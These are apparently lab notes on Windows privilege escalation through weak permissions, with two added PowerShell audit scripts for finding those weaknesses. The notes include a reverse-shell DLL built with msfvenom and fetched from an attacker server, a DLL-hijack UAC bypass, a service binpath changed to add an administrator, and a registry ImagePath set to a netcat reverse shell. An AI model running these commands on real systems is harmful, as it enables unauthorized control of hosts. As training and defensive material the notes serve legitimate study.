15. Weak Permissions

Show the current user's name and SID with whoami

whoami /user

List members of the administrators group

net localgroup administrators

Display the privileges of the current user

whoami /priv

Query the registry to check whether UAC is enabled and which prompt level applies to administrators

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin

Get the OS version (PowerShell) and print the PATH variable (cmd); the per-user WindowsApps folder used below is on the user PATH by default

[environment]::OSVersion.Version
cmd /c echo %PATH%

List tasks and filter for rundll32 processes

# Useful to identify suspicious rundll32 usage
tasklist /svc | findstr "rundll32"

Kill a process by specifying its PID

# Replace <pid> with the actual process ID
taskkill /PID <pid> /F

Generate a reverse TCP shell DLL using msfvenom

# Replace <attacker_ip> and <attacker_port> with actual values
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f dll > srrstr.dll

Start a Python HTTP server to host the DLL payload

python3 -m http.server <port>

Download the DLL from the attacker's web server into the user-writable WindowsApps folder (run in PowerShell, where curl is an alias for Invoke-WebRequest and -O resolves to -OutFile; curl.exe would need -o instead)

curl http://<attacker_ip>:<port>/srrstr.dll -O "C:\Users\<user>\AppData\Local\Microsoft\WindowsApps\srrstr.dll"

Set up Netcat listener to capture the reverse shell

nc -lvnp <attacker_port>

Execute the DLL payload using rundll32

rundll32 shell32.dll,Control_RunDLL C:\Users\<user>\AppData\Local\Microsoft\WindowsApps\srrstr.dll

Launch the 32-bit SystemPropertiesAdvanced.exe, which searches the PATH for srrstr.dll and loads the planted copy

C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

Confirm the current user after potential privilege escalation

whoami
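The hijack above works because a user-writable directory (the per-user WindowsApps folder) sits on the PATH that SystemPropertiesAdvanced.exe searches. The following PowerShell check is an added example, not part of the original notes: it lists every machine- and user-scope PATH entry and reports which ones the current user can write to, so the condition can be found and removed before a DLL is planted. The function names are mine.

```powershell
# Added example, not part of the original notes: list PATH directories the
# current user can write to. A writable PATH entry such as the per-user
# WindowsApps folder is what lets a planted srrstr.dll be picked up by
# SystemPropertiesAdvanced.exe. Run it as the low-privileged user being
# assessed; the write test creates and immediately deletes an empty probe file.

function Test-WritableDirectory {
    # Effective-permission test: try to create a file rather than reasoning about
    # the ACL, so group membership, inheritance and deny ACEs are all accounted for.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ('pathprobe-' + [guid]::NewGuid().ToString('N') + '.tmp')
    try {
        [System.IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

function Get-PathEntryReport {
    # Machine and user scopes are reported separately so the fix lands in the right
    # place (System Properties for the machine PATH, the user's profile for the user PATH).
    $scopes = [ordered]@{
        Machine = [Environment]::GetEnvironmentVariable('PATH', 'Machine')
        User    = [Environment]::GetEnvironmentVariable('PATH', 'User')
    }
    foreach ($scope in $scopes.Keys) {
        foreach ($entry in ($scopes[$scope] -split ';')) {
            $entry = $entry.Trim()
            if (-not $entry) { continue }
            $expanded = [Environment]::ExpandEnvironmentVariables($entry)
            [pscustomobject]@{
                Scope    = $scope
                Entry    = $entry
                Exists   = Test-Path -LiteralPath $expanded -PathType Container
                Writable = Test-WritableDirectory -Path $expanded
            }
        }
    }
}

$report = Get-PathEntryReport
$report | Format-Table -AutoSize
# Writable entries are the hijack condition; missing entries are listed for review
# as well, because whoever can create the directory gets the same outcome.
$report | Where-Object { $_.Writable -or -not $_.Exists } |
    ForEach-Object {
        $state = if ($_.Writable) { 'writable' } else { 'missing' }
        Write-Warning ("{0} PATH entry '{1}' is {2}" -f $_.Scope, $_.Entry, $state)
    }
```

Run it in the context of each account type you care about (a standard user will usually see the WindowsApps entry flagged); the remediation is to drop the writable directory from PATH or to tighten its ACL, and to apply the same test to any directory a service or scheduled task adds to PATH.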

1. Permissive File System ACLs (SecurityService)

.\SharpUp.exe audit
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
sc start SecurityService

2. Weak Service Permissions (WindscribeService)

.\SharpUp.exe audit
accesschk.exe /accepteula -quvcw WindscribeService
net localgroup administrators
sc config WindscribeService binpath= "cmd /c net localgroup administrators htb-student /add"
sc stop WindscribeService
sc start WindscribeService
net localgroup administrators
sc config WindscribeService binpath= "c:\Program Files (x86)\Windscribe\WindscribeService.exe"
sc start WindscribeService
sc query WindscribeService

3. Unquoted Service Paths (SystemExplorerHelpService)

sc qc SystemExplorerHelpService
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

4. Permissive Registry ACLs (ModelManagerService)

accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"

5. Modifiable Registry Autorun Binary

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl
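As an added example (not from the original notes, and not SharpUp's or accesschk's code), this read-only PowerShell audit covers the five weakness classes above in one pass: service binaries and autorun binaries writable by low-privileged identities (1, 5), service DACLs that grant SERVICE_CHANGE_CONFIG or broader rights to such identities (2, parsed from sc.exe sdshow), unquoted auto-start paths containing spaces (3), and writable keys under HKLM\SYSTEM\CurrentControlSet\Services (4). The function names and the $LowPriv* lists are my assumptions; extend the lists with any domain groups that stand in for "all users" in your environment.

```powershell
# Added example, not part of the original notes: read-only audit of the five
# weakness classes. Run as an administrator on the host being assessed; it
# returns finding objects that can be piped to Format-Table or Export-Csv.

# Identities whose write access means any ordinary user can take over the service.
$LowPrivNames = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$LowPrivSids  = @('WD', 'BU', 'AU', 'IU', 'S-1-1-0', 'S-1-5-32-545', 'S-1-5-11', 'S-1-5-4')  # same identities in SDDL form
$FileWriteMask = [System.Security.AccessControl.FileSystemRights] 'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
$KeyWriteMask  = [System.Security.AccessControl.RegistryRights] 'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership'
# Service rights that allow reconfiguring, deleting or re-ACLing the service:
# DC = SERVICE_CHANGE_CONFIG, SD = DELETE, WD = WRITE_DAC, WO = WRITE_OWNER, GA/GW = GENERIC_ALL/GENERIC_WRITE
$BadServiceRights = @('DC', 'SD', 'WD', 'WO', 'GA', 'GW')
$BadServiceMask   = 0x2 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

function Get-ExecutablePath {
    # Extracts the program path from a service ImagePath or autorun command line,
    # quoted or not (unquoted tokens are joined until one ends in .exe).
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $cl = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cl.StartsWith('"')) { return $cl.Substring(1).Split('"')[0] }
    $acc = ''
    foreach ($tok in ($cl -split '\s+')) {
        $acc = if ($acc) { "$acc $tok" } else { $tok }
        if ($acc -match '\.exe$') { return $acc }
    }
    return ($cl -split '\s+')[0]
}

function Get-LowPrivWriteAce {
    # ACEs on a file or registry key that grant write-class rights to a low-privileged identity.
    param([string]$Path, [switch]$Registry)
    if (-not $Path) { return }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return }
    $mask = [int]$(if ($Registry) { $KeyWriteMask } else { $FileWriteMask })
    $acl.Access | Where-Object {
        $rights = [int]$(if ($Registry) { $_.RegistryRights } else { $_.FileSystemRights })
        $_.AccessControlType -eq 'Allow' -and ($LowPrivNames -contains $_.IdentityReference.Value) -and (($rights -band $mask) -ne 0)
    }
}

function Get-WeakServiceDacl {
    # Parses the service DACL (sc.exe sdshow) for dangerous rights granted to low-privileged SIDs.
    param([string]$Name)
    $sddl = ((& sc.exe sdshow $Name 2>$null) -join '').Trim()
    foreach ($m in [regex]::Matches($sddl, '\(A;[^;]*;([^;]*);;;([^)]*)\)')) {
        $rights = $m.Groups[1].Value; $who = $m.Groups[2].Value
        if ($LowPrivSids -notcontains $who) { continue }
        if ($rights -match '^0x') {
            $hit = ([Convert]::ToInt64($rights, 16) -band $BadServiceMask) -ne 0
        } else {
            $tokens = for ($i = 0; $i + 1 -lt $rights.Length; $i += 2) { $rights.Substring($i, 2) }
            $hit = @($tokens | Where-Object { $BadServiceRights -contains $_ }).Count -gt 0
        }
        if ($hit) { [pscustomobject]@{ Check = 'ServiceDACL'; Name = $Name; Detail = "$who has $rights" } }
    }
}

function Invoke-WeakPermissionAudit {
    $findings = New-Object System.Collections.Generic.List[object]
    foreach ($svc in Get-CimInstance Win32_Service) {
        $exe = Get-ExecutablePath $svc.PathName
        # 1. Binary replaceable by low-privileged users (what icacls showed for SecurityService)
        foreach ($ace in Get-LowPrivWriteAce -Path $exe) {
            $findings.Add([pscustomobject]@{ Check = 'BinaryACL'; Name = $svc.Name; Detail = "$($ace.IdentityReference) has $($ace.FileSystemRights) on $exe" })
        }
        # 2. Service configuration changeable by low-privileged users (what accesschk -w showed)
        foreach ($f in Get-WeakServiceDacl -Name $svc.Name) { $findings.Add($f) }
        # 3. Unquoted auto-start path containing spaces (the wmic filter above, without the c:\windows exclusion)
        if ($svc.StartMode -eq 'Auto' -and $svc.PathName -and -not $svc.PathName.StartsWith('"') -and $exe -match ' ') {
            $findings.Add([pscustomobject]@{ Check = 'UnquotedPath'; Name = $svc.Name; Detail = $svc.PathName })
        }
        # 4. Service registry key (where ImagePath lives) writable by low-privileged users
        foreach ($ace in Get-LowPrivWriteAce -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)" -Registry) {
            $findings.Add([pscustomobject]@{ Check = 'RegistryACL'; Name = $svc.Name; Detail = "$($ace.IdentityReference) has $($ace.RegistryRights)" })
        }
    }
    # 5. Autorun binaries (Win32_StartupCommand) writable by low-privileged users
    foreach ($cmd in Get-CimInstance Win32_StartupCommand) {
        $exe = Get-ExecutablePath $cmd.Command
        foreach ($ace in Get-LowPrivWriteAce -Path $exe) {
            $findings.Add([pscustomobject]@{ Check = 'AutorunACL'; Name = $cmd.Name; Detail = "$($ace.IdentityReference) has $($ace.FileSystemRights) on $exe" })
        }
    }
    return $findings
}

Invoke-WeakPermissionAudit | Format-Table -AutoSize -Wrap
```

Each finding names the check that produced it, so the fix is direct: tighten the file or key ACL, quote the ImagePath, or rewrite the service DACL (sc.exe sdset) so that only administrators and SYSTEM hold DC/SD/WD/WO. Re-running the audit after the change is the equivalent of the "Verify" step in the summary below.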

Key Concepts:

  • Weak Windows Permissions: Misconfigurations allow privilege escalation.

  • Service Focus: Services usually run as SYSTEM, so their binaries, configuration and registry keys are the key targets.

Approach, Commands, Tools, and Techniques:

  1. Detect: SharpUp, accesschk, icacls, wmic, PowerShell (autorun).

  2. Exploit: copy, sc config/start/stop, net localgroup, PowerShell (registry).

  3. Verify: net localgroup, sc query.

Commands:

  • SharpUp, accesschk, icacls, sc, net localgroup, copy, wmic, PowerShell (Set-ItemProperty, Get-CimInstance).
